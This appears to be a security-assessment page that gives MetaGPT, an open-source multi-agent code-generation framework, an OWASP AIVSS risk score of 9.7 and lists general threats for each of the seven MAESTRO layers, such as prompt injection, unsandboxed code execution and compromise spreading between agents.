MetaGPT — agentic threat model

9.7AIVSS 9.7 · Critical

MetaGPT presents a high agentic risk profile due to its multi-agent collaboration and automated code generation capabilities, which can be exploited to execute unauthorized code or inject supply-chain vulnerabilities if deployed without strict sandboxing.

OWASP AIVSS score rationale

AIVSS = (CVSS_Base + AARS) × Mitigation_Factor, where AARS = (10 − CVSS_Base) × (Factor_Sum / 10) × ThM

CVSS base 8.5AARS uplift 1.17Factor sum 7.1/10Threat ×1.1Mitigation ×1.0

Autonomy of Action		0.80
Goal-Driven Planning		1.00
Self-Modification		0.30
Dynamic Tool Use		0.80
Persistent Memory		0.60
Contextual Awareness		0.80
Dynamic Identity		0.50
Multi-Agent Interactions		1.00
Non-Determinism		0.70
Opacity & Reflexivity		0.60

Scored with the canonical OWASP AIVSS formula (AIVSS calculator reference); agentic risk factors estimated from the agent’s described capabilities.

MAESTRO 7-layer threat model

Per-layer threats for this agent. Layers tagged “not certain from listing” are general, caveated commentary where the public description didn’t pin that layer.

L1 · Foundation Models⚠ not certain from listing

Not certain from the listing — relies on external foundation LLMs which are inherently susceptible to prompt injection, adversarial reprogramming, and generating insecure or malicious code snippets.

L2 · Data Operations⚠ not certain from listing

Not certain from the listing — handles sensitive software design documents, SOPs, and source code. Insecure data handling could lead to codebase exfiltration or poisoning of the context used by the agents.

L3 · Agent Frameworks✓ mapped

MetaGPT's core framework orchestrates complex agent workflows. Vulnerabilities here include insecure tool execution (e.g., running generated code or compilers) and prompt injection that bypasses the defined SOP constraints.

L4 · Deployment & Infrastructure⚠ not certain from listing

Not certain from the listing — as an open-source framework, deployment is user-managed. Running MetaGPT without strict containerization or sandboxing poses severe risks of host compromise during automated code execution.

L5 · Evaluation & Observability⚠ not certain from listing

Not certain from the listing — does not specify built-in guardrails, real-time monitoring, or anomaly detection to identify when agents deviate from SOPs or generate malicious payloads.

L6 · Security & Compliance (cross-cutting)⚠ not certain from listing

Not certain from the listing — lacks native enterprise security controls, access policies, or compliance auditing, requiring organizations to wrap the framework in their own security boundaries.

L7 · Agent Ecosystem✓ mapped

Highly relevant. MetaGPT relies heavily on multi-agent interactions. A compromise in one agent (e.g., the Product Manager or Architect) can propagate trust and cause cascading failures or malicious code injection across the entire agent chain.

MAESTRO — the 7-layer agentic threat-modeling framework (Cloud Security Alliance / Ken Huang).